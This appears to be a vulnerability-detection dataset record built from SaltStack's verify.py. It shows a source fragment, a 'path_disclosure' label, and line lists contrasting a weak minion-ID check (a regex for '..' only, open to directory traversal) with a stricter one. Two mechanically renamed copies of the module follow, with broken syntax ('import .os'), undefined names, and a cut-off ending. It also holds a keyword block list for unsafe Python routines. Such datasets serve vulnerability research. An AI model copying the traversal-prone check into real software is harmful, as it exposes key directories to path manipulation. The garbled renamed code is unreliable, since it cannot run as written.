Returns a full list of directories leading up to, and including, a path.
So list_path_traversal('/path/to/salt') would return:
['/', '/path', '/path/to', '/path/to/salt']
in that order.
This routine has been tested on Windows systems as well.
list_path_traversal('c:\\path\\to\\salt') on Windows would return:
['c:\\', 'c:\\path', 'c:\\path\\to', 'c:\\path\\to\\salt']
'''
out = [path]
(head, tail) = os.path.split(path)
if tail == '':
# paths with trailing separators will return an empty string
out = [head]
(head, tail) = os.path.split(head)
while head != out[0]:
# loop until head is the same two consecutive times
out.insert(0, head)
(head, tail) = os.path.split(head)
return out
def check_path_traversal(path, user='root', skip_perm_errors=False):
'''
Walk from the root up to a directory and verify that the current
user has access to read each directory. This is used for making
sure a user can read all parent directories of the minion's key
before trying to go and generate a new key and raising an IOError
'''
for tpath in list_path_traversal(path):
if not os.access(tpath, os.R_OK):
msg = 'Could not access {0}.'.format(tpath)
if not os.path.exists(tpath):
msg += ' Path does not exist.'
else:
current_user = salt.utils.get_user()
# Make the error message more intelligent based on how
# the user invokes salt-call or whatever other script.
if user != current_user:
msg += ' Try running as user {0}.'.format(user)
else:
msg += ' Please give {0} read permissions.'.format(user)
# We don't need to bail on config file permission errors
# if the CLI
# process is run with the -a flag
if skip_perm_errors:
return
# Propagate this exception up so there isn't a sys.exit()
# in the middle of code that could be imported elsewhere.
raise SaltClientError(msg)
def check_max_open_files(opts):
'''
Check the number of max allowed open files and adjust if needed
'''
mof_c = opts.get('max_open_files', 100000)
if sys.platform.startswith('win'):
# Check the Windows API for more detail on this
# http://msdn.microsoft.com/en-us/library/xt874334(v=vs.71).aspx
# and the python binding http://timgolden.me.uk/pywin32-docs/win32file.html
mof_s = mof_h = win32file._getmaxstdio()
else:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
accepted_keys_dir = os.path.join(opts.get('pki_dir'), 'minions')
accepted_count = len(os.listdir(accepted_keys_dir))
log.debug(
'This salt-master instance has accepted {0} minion keys.'.format(
accepted_count
)
)
level = logging.INFO
if (accepted_count * 4) <= mof_s:
# We check for the soft value of max open files here because that's the
# value the user chose to raise to.
#
# The number of accepted keys multiplied by four(4) is lower than the
# soft value, everything should be OK
return
msg = (
'The number of accepted minion keys({0}) should be lower than 1/4 '
'of the max open files soft setting({1}). '.format(
accepted_count, mof_s
)
)
if accepted_count >= mof_s:
# This should never occur, it might have already crashed
msg += 'salt-master will crash pretty soon! '
level = logging.CRITICAL
elif (accepted_count * 2) >= mof_s:
# This is way too low, CRITICAL
level = logging.CRITICAL
elif (accepted_count * 3) >= mof_s:
level = logging.WARNING
# The accepted count is more than 3 time, WARN
elif (accepted_count * 4) >= mof_s:
level = logging.INFO
if mof_c < mof_h:
msg += ('According to the system\'s hard limit, there\'s still a '
'margin of {0} to raise the salt\'s max_open_files '
'setting. ').format(mof_h - mof_c)
msg += 'Please consider raising this value.'
log.log(level=level, msg=msg)
def clean_path(root, path, subdir=False):
'''
Accepts the root the path needs to be under and verifies that the path is
under said root. Pass in subdir=True if the path can result in a
subdirectory of the root instead of having to reside directly in the root
'''
if not os.path.isabs(root):
return ''
if not os.path.isabs(path):
path = os.path.join(root, path)
path = os.path.normpath(path)
if subdir:
if path.startswith(root):
return path
else:
if os.path.dirname(path) == os.path.normpath(root):
return path
return ''
def valid_id(opts, id_):
'''
Returns if the passed id is valid
'''
try:
if any(x in id_ for x in ('/', '\\', '\0')):
return False
return bool(clean_path(opts['pki_dir'], id_))
except (AttributeError, KeyError, TypeError):
return False
def safe_py_code(code):
'''
Check a string to see if it has any potentially unsafe routines which
could be executed via python, this routine is used to improve the
safety of modules suct as virtualenv
'''
bads = (
'import',
';',
'subprocess',
'eval',
'open',
'file',
'exec',
'input')
for bad in bads:
if code.count(bad):
return False
return True
def verify_log(opts):
'''
If an insecre logging configuration is found, show a warning
'''
level = LOG_LEVELS.get(str(opts.get('log_level')).lower(), logging.NOTSET)
if level < logging.INFO:
log.warning('Insecure logging configuration detected! Sensitive data may be logged.')
def win_verify_env(dirs, permissive=False, pki_dir='', skip_extra=False):
'''
Verify that the named directories are in place and that the environment
can shake the salt
'''
import salt.utils.win_functions
import salt.utils.win_dacl
# Get the root path directory where salt is installed
path = dirs[0]
while os.path.basename(path) not in ['salt', 'salt-tests-tmpdir']:
path, base = os.path.split(path)
# Create the root path directory if missing
if not os.path.isdir(path):
os.makedirs(path)
# Set permissions to the root path directory
current_user = salt.utils.win_functions.get_current_user()
if salt.utils.win_functions.is_admin(current_user):
try:
# Make the Administrators group owner
# Use the SID to be locale agnostic
salt.utils.win_dacl.set_owner(path, 'S-1-5-32-544')
except CommandExecutionError:
msg = 'Unable to securely set the owner of "{0}".'.format(path)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
if not permissive:
try:
# Get a clean dacl by not passing an obj_name
dacl = salt.utils.win_dacl.dacl()
# Add aces to the dacl, use the GUID (locale non-specific)
# Administrators Group
dacl.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
# System
dacl.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
# Owner
dacl.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
# Save the dacl to the object
dacl.save(path, True)
except CommandExecutionError:
msg = 'Unable to securely set the permissions of ' \
'"{0}".'.format(path)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
# Create the directories
for dir_ in dirs:
if not dir_:
continue
if not os.path.isdir(dir_):
try:
os.makedirs(dir_)
except OSError as err:
msg = 'Failed to create directory path "{0}" - {1}\n'
sys.stderr.write(msg.format(dir_, err))
sys.exit(err.errno)
# The PKI dir gets its own permissions
if dir_ == pki_dir:
try:
# Make Administrators group the owner
salt.utils.win_dacl.set_owner(path, 'S-1-5-32-544')
# Give Admins, System and Owner permissions
# Get a clean dacl by not passing an obj_name
dacl = salt.utils.win_dacl.dacl()
# Add aces to the dacl, use the GUID (locale non-specific)
# Administrators Group
dacl.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
# System
dacl.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
# Owner
dacl.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
# Save the dacl to the object
dacl.save(dir_, True)
except CommandExecutionError:
msg = 'Unable to securely set the permissions of "{0}".'
msg = msg.format(dir_)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
if skip_extra is False:
# Run the extra verification checks
zmq_version()
| path_disclosure | {
"code": [
"def clean_id(id_):",
" Returns if the passed id is clean.",
" if re.search(r'\\.\\.\\{sep}'.format(sep=os.sep), id_):",
" return False",
" return True",
" return bool(clean_path(opts['pki_dir'], id_)) and clean_id(id_)",
" except (AttributeError, KeyError, TypeError) as e:"
],
"line_no": [
483,
485,
487,
488,
489,
497,
498
]
} | {
"code": [
" if any(x in id_ for x in ('/', '\\\\', '\\0')):",
" return False",
" except (AttributeError, KeyError, TypeError):"
],
"line_no": [
488,
489,
491
]
} |
from __future__ import absolute_import
import .os
import re
import sys
import stat
import .errno
import .socket
import .logging
try:
import win32file
except ImportError:
import resource
from salt.log import is_console_configured
from salt.log.setup import LOG_LEVELS
from salt.exceptions import SaltClientError, SaltSystemExit, \
CommandExecutionError
import salt.defaults.exitcodes
import salt.utils
VAR_0 = logging.getLogger(__name__)
def FUNC_0():
try:
import zmq
except Exception:
return True
VAR_18 = zmq.__version__
VAR_19 = re.match(r'^(\d+)\.(\d+)(?:\.(\d+))?', VAR_18)
if not VAR_19:
VAR_32 = "Using untested zmq python bindings version: '{0}'".format(VAR_18)
if is_console_configured():
VAR_0.warning(VAR_32)
else:
sys.stderr.write("WARNING {0}\n".format(VAR_32))
return True
VAR_20, VAR_21, VAR_22 = VAR_19.groups()
if VAR_20.isdigit():
VAR_20 = int(VAR_20)
if VAR_21.isdigit():
VAR_21 = int(VAR_21)
if VAR_22 and VAR_22.isdigit():
VAR_22 = int(VAR_22)
if VAR_20 == 2 and VAR_21 == 1:
if "dev" in VAR_18 and not VAR_22:
VAR_32 = 'Using dev zmq module, please report unexpected results'
if is_console_configured():
VAR_0.warning(VAR_32)
else:
sys.stderr.write("WARNING: {0}\n".format(VAR_32))
return True
elif VAR_22 and VAR_22 >= 9:
return True
elif VAR_20 > 2 or (VAR_20 == 2 and VAR_21 > 1):
return True
VAR_0.critical('ZeroMQ python bindings >= 2.1.9 are required')
if 'salt-master' in sys.argv[0]:
VAR_32 = ('The Salt Master is unstable using a ZeroMQ version '
'lower than 2.1.11 and requires this fix: http://lists.zeromq.'
'org/pipermail/zeromq-dev/2011-June/012094.html')
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write('CRITICAL {0}\n'.format(VAR_32))
return False
def FUNC_1(VAR_1):
VAR_23 = socket.AF_INET
try:
VAR_35 = socket.getaddrinfo(
VAR_1 or None, None, socket.AF_UNSPEC, socket.SOCK_STREAM
)
if not VAR_35:
return VAR_23
VAR_36 = VAR_35[0]
return VAR_36[0]
except socket.gaierror:
return VAR_23
def FUNC_2(VAR_2, VAR_3, VAR_4):
VAR_24 = FUNC_1(VAR_2)
for port in VAR_3, VAR_4:
VAR_37 = socket.socket(VAR_24, socket.SOCK_STREAM)
try:
VAR_37.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
VAR_37.bind((VAR_2, int(port)))
except Exception as exc:
VAR_32 = 'Unable to bind socket {0}:{1}'.format(VAR_2, port)
if exc.args:
VAR_32 = '{0}, error: {1}'.format(VAR_32, str(exc))
else:
VAR_32 = '{0}, this might not be a problem.'.format(VAR_32)
msg += '; Is there another salt-master running?'
if is_console_configured():
VAR_0.warning(VAR_32)
else:
sys.stderr.write('WARNING: {0}\n'.format(VAR_32))
return False
finally:
VAR_37.close()
return True
def FUNC_3(VAR_5, VAR_6):
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
try:
VAR_38 = pwd.getpwnam(VAR_6)
VAR_39 = VAR_38[2]
except KeyError:
VAR_49 = ('Failed to prepare the Salt environment for VAR_6 '
'{0}. The VAR_6 is not available.\n').format(VAR_6)
sys.stderr.write(VAR_49)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for fn_ in VAR_5:
VAR_40 = VAR_54.path.dirname(fn_)
try:
if VAR_40:
try:
VAR_54.makedirs(VAR_40)
except OSError as VAR_49:
if VAR_49.errno != errno.EEXIST:
raise
if not VAR_54.path.isfile(fn_):
with salt.utils.fopen(fn_, 'w+') as fp_:
fp_.write('')
except IOError as VAR_49:
if VAR_54.path.isfile(VAR_40):
VAR_32 = 'Failed to create VAR_11 {0}, is {1} a file?'.format(fn_, VAR_40)
raise SaltSystemExit(VAR_32=msg)
if VAR_49.errno != errno.EACCES:
raise
VAR_32 = 'No permissions to access "{0}", are you running as the correct VAR_6?'.format(fn_)
raise SaltSystemExit(VAR_32=msg)
except OSError as VAR_49:
VAR_32 = 'Failed to create VAR_11 "{0}" - {1}'.format(fn_, VAR_49)
raise SaltSystemExit(VAR_32=msg)
VAR_41 = VAR_54.stat(fn_)
if VAR_39 != VAR_41.st_uid:
try:
VAR_54.chown(fn_, VAR_39, -1)
except OSError:
pass
return True
def FUNC_4(VAR_7, VAR_6, VAR_8=False, VAR_9='', VAR_10=False):
if salt.utils.is_windows():
return FUNC_14(VAR_7, VAR_8, VAR_9, VAR_10)
import pwd # after confirming not running Windows
try:
VAR_38 = pwd.getpwnam(VAR_6)
VAR_39 = VAR_38[2]
VAR_42 = VAR_38[3]
VAR_43 = salt.utils.get_gid_list(VAR_6, include_default=False)
except KeyError:
VAR_49 = ('Failed to prepare the Salt environment for VAR_6 '
'{0}. The VAR_6 is not available.\n').format(VAR_6)
sys.stderr.write(VAR_49)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for dir_ in VAR_7:
if not dir_:
continue
if not VAR_54.path.isdir(dir_):
try:
VAR_52 = VAR_54.umask(18) # 077
VAR_54.makedirs(dir_)
if VAR_54.getuid() == 0:
VAR_54.chown(dir_, VAR_39, VAR_42)
VAR_54.umask(VAR_52)
except OSError as VAR_49:
VAR_32 = 'Failed to create directory VAR_11 "{0}" - {1}\n'
sys.stderr.write(VAR_32.format(dir_, VAR_49))
sys.exit(VAR_49.errno)
VAR_44 = VAR_54.stat(dir_)
if VAR_54.getuid() == 0:
VAR_50 = VAR_54.stat(dir_)
if VAR_50.st_uid != VAR_39 or VAR_50.st_gid != VAR_42:
if VAR_8 and VAR_50.st_gid in VAR_43:
pass
else:
VAR_54.chown(dir_, VAR_39, VAR_42)
for VAR_15 in [a for a in VAR_54.listdir(dir_) if 'jobs' not in a]:
VAR_53 = VAR_54.path.join(dir_, VAR_15)
if '{0}jobs'.format(VAR_54.path.sep) in VAR_53:
continue
for VAR_14, VAR_7, VAR_5 in VAR_54.walk(VAR_53):
for name in VAR_5:
if name.startswith('.'):
continue
VAR_11 = VAR_54.path.join(VAR_14, name)
try:
VAR_50 = VAR_54.stat(VAR_11)
except (IOError, OSError):
pass
if VAR_50.st_uid != VAR_39 or VAR_50.st_gid != VAR_42:
if VAR_8 and VAR_50.st_gid in VAR_43:
pass
else:
VAR_54.chown(VAR_11, VAR_39, VAR_42)
for name in VAR_7:
VAR_11 = VAR_54.path.join(VAR_14, name)
VAR_50 = VAR_54.stat(VAR_11)
if VAR_50.st_uid != VAR_39 or VAR_50.st_gid != VAR_42:
if VAR_8 and VAR_50.st_gid in VAR_43:
pass
else:
VAR_54.chown(VAR_11, VAR_39, VAR_42)
if dir_ == VAR_9:
VAR_51 = stat.S_IMODE(VAR_44.st_mode)
if VAR_51 != 448 and VAR_51 != 488:
if VAR_54.access(dir_, VAR_54.W_OK):
VAR_54.chmod(dir_, 448)
else:
VAR_32 = 'Unable to securely set the permissions of "{0}".'
VAR_32 = msg.format(dir_)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
if VAR_10 is False:
FUNC_0()
def FUNC_5(VAR_6):
if salt.utils.is_windows():
return True
if VAR_6 == salt.utils.get_user():
return True
import pwd # after confirming not running Windows
try:
VAR_45 = pwd.getpwnam(VAR_6)
try:
if hasattr(VAR_54, 'initgroups'):
VAR_54.initgroups(VAR_6, VAR_45.pw_gid) # pylint: disable=minimum-python-version
else:
VAR_54.setgroups(salt.utils.get_gid_list(VAR_6, include_default=False))
VAR_54.setgid(VAR_45.pw_gid)
VAR_54.setuid(VAR_45.pw_uid)
if 'HOME' in VAR_54.environ:
VAR_54.environ['HOME'] = VAR_45.pw_dir
if 'SHELL' in VAR_54.environ:
VAR_54.environ['SHELL'] = VAR_45.pw_shell
for VAR_56 in ('USER', 'LOGNAME'):
if VAR_56 in VAR_54.environ:
VAR_54.environ[VAR_56] = VAR_45.pw_name
except OSError:
VAR_32 = 'Salt configured to run as VAR_6 "{0}" but unable to switch.'
VAR_32 = msg.format(VAR_6)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
return False
except KeyError:
VAR_32 = 'User not found: "{0}"'.format(VAR_6)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
return False
return True
def FUNC_6(VAR_11):
VAR_25 = [VAR_11]
(VAR_26, VAR_27) = VAR_54.path.split(VAR_11)
if VAR_27 == '':
VAR_25 = [VAR_26]
(head, VAR_27) = VAR_54.path.split(VAR_26)
while VAR_26 != VAR_25[0]:
VAR_25.insert(0, VAR_26)
(head, VAR_27) = VAR_54.path.split(VAR_26)
return VAR_25
def FUNC_7(VAR_11, VAR_6='root', VAR_12=False):
for tpath in FUNC_6(VAR_11):
if not VAR_54.access(tpath, VAR_54.R_OK):
VAR_32 = 'Could not access {0}.'.format(tpath)
if not VAR_54.path.exists(tpath):
VAR_32 += ' Path does not exist.'
else:
VAR_34 = salt.utils.get_user()
if VAR_6 != VAR_34:
VAR_32 += ' Try running as VAR_6 {0}.'.format(VAR_6)
else:
VAR_32 += ' Please give {0} read permissions.'.format(VAR_6)
if VAR_12:
return
raise SaltClientError(VAR_32)
def FUNC_8(VAR_13):
VAR_28 = VAR_13.get('max_open_files', 100000)
if sys.platform.startswith('win'):
VAR_46 = VAR_47 = win32file._getmaxstdio()
else:
VAR_46, VAR_47 = resource.getrlimit(resource.RLIMIT_NOFILE)
VAR_29 = VAR_54.path.join(VAR_13.get('pki_dir'), 'minions')
VAR_30 = len(VAR_54.listdir(VAR_29))
VAR_0.debug(
'This salt-master instance has accepted {0} minion keys.'.format(
VAR_30
)
)
VAR_31 = logging.INFO
if (VAR_30 * 4) <= VAR_46:
return
VAR_32 = (
'The number of accepted minion keys({0}) should be lower than 1/4 '
'of the max open VAR_5 soft setting({1}). '.format(
VAR_30, VAR_46
)
)
if VAR_30 >= VAR_46:
VAR_32 += 'salt-master will crash pretty soon! '
VAR_31 = logging.CRITICAL
elif (VAR_30 * 2) >= VAR_46:
VAR_31 = logging.CRITICAL
elif (VAR_30 * 3) >= VAR_46:
VAR_31 = logging.WARNING
elif (VAR_30 * 4) >= VAR_46:
VAR_31 = logging.INFO
if VAR_28 < VAR_47:
VAR_32 += ('According to the system\'s hard limit, there\'s still a '
'margin of {0} to raise the salt\'s max_open_files '
'setting. ').format(VAR_47 - VAR_28)
VAR_32 += 'Please consider raising this value.'
VAR_0.log(VAR_31=level, VAR_32=msg)
def FUNC_9(VAR_14, VAR_11, VAR_15=False):
if not VAR_54.path.isabs(VAR_14):
return ''
if not VAR_54.path.isabs(VAR_11):
VAR_11 = VAR_54.path.join(VAR_14, VAR_11)
VAR_11 = VAR_54.path.normpath(VAR_11)
if VAR_15:
if VAR_11.startswith(VAR_14):
return VAR_11
else:
if VAR_54.path.dirname(VAR_11) == VAR_54.path.normpath(VAR_14):
return VAR_11
return ''
def FUNC_10(VAR_16):
if re.search(r'\.\.\{sep}'.format(sep=VAR_54.sep), VAR_16):
return False
return True
def FUNC_11(VAR_13, VAR_16):
try:
return bool(FUNC_9(VAR_13['pki_dir'], VAR_16)) and FUNC_10(VAR_16)
except (AttributeError, KeyError, TypeError) as e:
return False
def FUNC_12(VAR_17):
VAR_33 = (
'import',
';',
'subprocess',
'eval',
'open',
'file',
'exec',
'input')
for bad in VAR_33:
if VAR_17.count(bad):
return False
return True
def FUNC_13(VAR_13):
VAR_31 = LOG_LEVELS.get(str(VAR_13.get('log_level')).lower(), logging.NOTSET)
if VAR_31 < logging.INFO:
VAR_0.warning('Insecure logging configuration detected! Sensitive data may be logged.')
def FUNC_14(VAR_7, VAR_8=False, VAR_9='', VAR_10=False):
import salt.utils.win_functions
import salt.utils.win_dacl
VAR_11 = VAR_7[0]
while VAR_54.path.basename(VAR_11) not in ['salt', 'salt-tests-tmpdir']:
VAR_11, VAR_48 = VAR_54.path.split(VAR_11)
if not VAR_54.path.isdir(VAR_11):
VAR_54.makedirs(VAR_11)
VAR_34 = salt.utils.win_functions.get_current_user()
if salt.utils.win_functions.is_admin(VAR_34):
try:
salt.utils.win_dacl.set_owner(VAR_11, 'S-1-5-32-544')
except CommandExecutionError:
VAR_32 = 'Unable to securely set the owner of "{0}".'.format(VAR_11)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
if not VAR_8:
try:
VAR_55 = salt.utils.win_dacl.dacl()
VAR_55.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.save(VAR_11, True)
except CommandExecutionError:
VAR_32 = 'Unable to securely set the permissions of ' \
'"{0}".'.format(VAR_11)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
for dir_ in VAR_7:
if not dir_:
continue
if not VAR_54.path.isdir(dir_):
try:
VAR_54.makedirs(dir_)
except OSError as VAR_49:
VAR_32 = 'Failed to create directory VAR_11 "{0}" - {1}\n'
sys.stderr.write(VAR_32.format(dir_, VAR_49))
sys.exit(VAR_49.errno)
if dir_ == VAR_9:
try:
salt.utils.win_dacl.set_owner(VAR_11, 'S-1-5-32-544')
VAR_55 = salt.utils.win_dacl.dacl()
VAR_55.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
VAR_55.save(dir_, True)
except CommandExecutionError:
VAR_32 = 'Unable to securely set the permissions of "{0}".'
VAR_32 = msg.format(dir_)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
if VAR_10 is False:
FUNC_0()
|
from __future__ import absolute_import
import .os
import re
import sys
import stat
import .errno
import .socket
import .logging
try:
import win32file
except ImportError:
import resource
from salt.log import is_console_configured
from salt.log.setup import LOG_LEVELS
from salt.exceptions import SaltClientError, SaltSystemExit, \
CommandExecutionError
import salt.defaults.exitcodes
import salt.utils
VAR_0 = logging.getLogger(__name__)
def FUNC_0():
try:
import zmq
except Exception:
return True
VAR_18 = zmq.__version__
VAR_19 = re.match(r'^(\d+)\.(\d+)(?:\.(\d+))?', VAR_18)
if not VAR_19:
VAR_32 = "Using untested zmq python bindings version: '{0}'".format(VAR_18)
if is_console_configured():
VAR_0.warning(VAR_32)
else:
sys.stderr.write("WARNING {0}\n".format(VAR_32))
return True
VAR_20, VAR_21, VAR_22 = VAR_19.groups()
if VAR_20.isdigit():
VAR_20 = int(VAR_20)
if VAR_21.isdigit():
VAR_21 = int(VAR_21)
if VAR_22 and VAR_22.isdigit():
VAR_22 = int(VAR_22)
if VAR_20 == 2 and VAR_21 == 1:
if "dev" in VAR_18 and not VAR_22:
VAR_32 = 'Using dev zmq module, please report unexpected results'
if is_console_configured():
VAR_0.warning(VAR_32)
else:
sys.stderr.write("WARNING: {0}\n".format(VAR_32))
return True
elif VAR_22 and VAR_22 >= 9:
return True
elif VAR_20 > 2 or (VAR_20 == 2 and VAR_21 > 1):
return True
VAR_0.critical('ZeroMQ python bindings >= 2.1.9 are required')
if 'salt-master' in sys.argv[0]:
VAR_32 = ('The Salt Master is unstable using a ZeroMQ version '
'lower than 2.1.11 and requires this fix: http://lists.zeromq.'
'org/pipermail/zeromq-dev/2011-June/012094.html')
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write('CRITICAL {0}\n'.format(VAR_32))
return False
def FUNC_1(VAR_1):
VAR_23 = socket.AF_INET
try:
VAR_35 = socket.getaddrinfo(
VAR_1 or None, None, socket.AF_UNSPEC, socket.SOCK_STREAM
)
if not VAR_35:
return VAR_23
VAR_36 = VAR_35[0]
return VAR_36[0]
except socket.gaierror:
return VAR_23
def FUNC_2(VAR_2, VAR_3, VAR_4):
VAR_24 = FUNC_1(VAR_2)
for port in VAR_3, VAR_4:
VAR_37 = socket.socket(VAR_24, socket.SOCK_STREAM)
try:
VAR_37.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
VAR_37.bind((VAR_2, int(port)))
except Exception as exc:
VAR_32 = 'Unable to bind socket {0}:{1}'.format(VAR_2, port)
if exc.args:
VAR_32 = '{0}, error: {1}'.format(VAR_32, str(exc))
else:
VAR_32 = '{0}, this might not be a problem.'.format(VAR_32)
msg += '; Is there another salt-master running?'
if is_console_configured():
VAR_0.warning(VAR_32)
else:
sys.stderr.write('WARNING: {0}\n'.format(VAR_32))
return False
finally:
VAR_37.close()
return True
def FUNC_3(VAR_5, VAR_6):
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
try:
VAR_38 = pwd.getpwnam(VAR_6)
VAR_39 = VAR_38[2]
except KeyError:
VAR_49 = ('Failed to prepare the Salt environment for VAR_6 '
'{0}. The VAR_6 is not available.\n').format(VAR_6)
sys.stderr.write(VAR_49)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for fn_ in VAR_5:
VAR_40 = VAR_54.path.dirname(fn_)
try:
if VAR_40:
try:
VAR_54.makedirs(VAR_40)
except OSError as VAR_49:
if VAR_49.errno != errno.EEXIST:
raise
if not VAR_54.path.isfile(fn_):
with salt.utils.fopen(fn_, 'w+') as fp_:
fp_.write('')
except IOError as VAR_49:
if VAR_54.path.isfile(VAR_40):
VAR_32 = 'Failed to create VAR_11 {0}, is {1} a file?'.format(fn_, VAR_40)
raise SaltSystemExit(VAR_32=msg)
if VAR_49.errno != errno.EACCES:
raise
VAR_32 = 'No permissions to access "{0}", are you running as the correct VAR_6?'.format(fn_)
raise SaltSystemExit(VAR_32=msg)
except OSError as VAR_49:
VAR_32 = 'Failed to create VAR_11 "{0}" - {1}'.format(fn_, VAR_49)
raise SaltSystemExit(VAR_32=msg)
VAR_41 = VAR_54.stat(fn_)
if VAR_39 != VAR_41.st_uid:
try:
VAR_54.chown(fn_, VAR_39, -1)
except OSError:
pass
return True
def FUNC_4(VAR_7, VAR_6, VAR_8=False, VAR_9='', VAR_10=False):
if salt.utils.is_windows():
return FUNC_13(VAR_7, VAR_8, VAR_9, VAR_10)
import pwd # after confirming not running Windows
try:
VAR_38 = pwd.getpwnam(VAR_6)
VAR_39 = VAR_38[2]
VAR_42 = VAR_38[3]
VAR_43 = salt.utils.get_gid_list(VAR_6, include_default=False)
except KeyError:
VAR_49 = ('Failed to prepare the Salt environment for VAR_6 '
'{0}. The VAR_6 is not available.\n').format(VAR_6)
sys.stderr.write(VAR_49)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for dir_ in VAR_7:
if not dir_:
continue
if not VAR_54.path.isdir(dir_):
try:
VAR_52 = VAR_54.umask(18) # 077
VAR_54.makedirs(dir_)
if VAR_54.getuid() == 0:
VAR_54.chown(dir_, VAR_39, VAR_42)
VAR_54.umask(VAR_52)
except OSError as VAR_49:
VAR_32 = 'Failed to create directory VAR_11 "{0}" - {1}\n'
sys.stderr.write(VAR_32.format(dir_, VAR_49))
sys.exit(VAR_49.errno)
VAR_44 = VAR_54.stat(dir_)
if VAR_54.getuid() == 0:
VAR_50 = VAR_54.stat(dir_)
if VAR_50.st_uid != VAR_39 or VAR_50.st_gid != VAR_42:
if VAR_8 and VAR_50.st_gid in VAR_43:
pass
else:
VAR_54.chown(dir_, VAR_39, VAR_42)
for VAR_15 in [a for a in VAR_54.listdir(dir_) if 'jobs' not in a]:
VAR_53 = VAR_54.path.join(dir_, VAR_15)
if '{0}jobs'.format(VAR_54.path.sep) in VAR_53:
continue
for VAR_14, VAR_7, VAR_5 in VAR_54.walk(VAR_53):
for name in VAR_5:
if name.startswith('.'):
continue
VAR_11 = VAR_54.path.join(VAR_14, name)
try:
VAR_50 = VAR_54.stat(VAR_11)
except (IOError, OSError):
pass
if VAR_50.st_uid != VAR_39 or VAR_50.st_gid != VAR_42:
if VAR_8 and VAR_50.st_gid in VAR_43:
pass
else:
VAR_54.chown(VAR_11, VAR_39, VAR_42)
for name in VAR_7:
VAR_11 = VAR_54.path.join(VAR_14, name)
VAR_50 = VAR_54.stat(VAR_11)
if VAR_50.st_uid != VAR_39 or VAR_50.st_gid != VAR_42:
if VAR_8 and VAR_50.st_gid in VAR_43:
pass
else:
VAR_54.chown(VAR_11, VAR_39, VAR_42)
if dir_ == VAR_9:
VAR_51 = stat.S_IMODE(VAR_44.st_mode)
if VAR_51 != 448 and VAR_51 != 488:
if VAR_54.access(dir_, VAR_54.W_OK):
VAR_54.chmod(dir_, 448)
else:
VAR_32 = 'Unable to securely set the permissions of "{0}".'
VAR_32 = msg.format(dir_)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
if VAR_10 is False:
FUNC_0()
def FUNC_5(VAR_6):
if salt.utils.is_windows():
return True
if VAR_6 == salt.utils.get_user():
return True
import pwd # after confirming not running Windows
try:
VAR_45 = pwd.getpwnam(VAR_6)
try:
if hasattr(VAR_54, 'initgroups'):
VAR_54.initgroups(VAR_6, VAR_45.pw_gid) # pylint: disable=minimum-python-version
else:
VAR_54.setgroups(salt.utils.get_gid_list(VAR_6, include_default=False))
VAR_54.setgid(VAR_45.pw_gid)
VAR_54.setuid(VAR_45.pw_uid)
if 'HOME' in VAR_54.environ:
VAR_54.environ['HOME'] = VAR_45.pw_dir
if 'SHELL' in VAR_54.environ:
VAR_54.environ['SHELL'] = VAR_45.pw_shell
for VAR_56 in ('USER', 'LOGNAME'):
if VAR_56 in VAR_54.environ:
VAR_54.environ[VAR_56] = VAR_45.pw_name
except OSError:
VAR_32 = 'Salt configured to run as VAR_6 "{0}" but unable to switch.'
VAR_32 = msg.format(VAR_6)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
return False
except KeyError:
VAR_32 = 'User not found: "{0}"'.format(VAR_6)
if is_console_configured():
VAR_0.critical(VAR_32)
else:
sys.stderr.write("CRITICAL: {0}\n".format(VAR_32))
return False
return True
def FUNC_6(VAR_11):
VAR_25 = [VAR_11]
(VAR_26, VAR_27) = VAR_54.path.split(VAR_11)
if VAR_27 == '':
VAR_25 = [VAR_26]
(head, VAR_27) = VAR_54.path.split(VAR_26)
while VAR_26 != VAR_25[0]:
VAR_25.insert(0, VAR_26)
(head, VAR_27) = VAR_54.path.split(VAR_26)
return VAR_25
def FUNC_7(VAR_11, VAR_6='root', VAR_12=False):
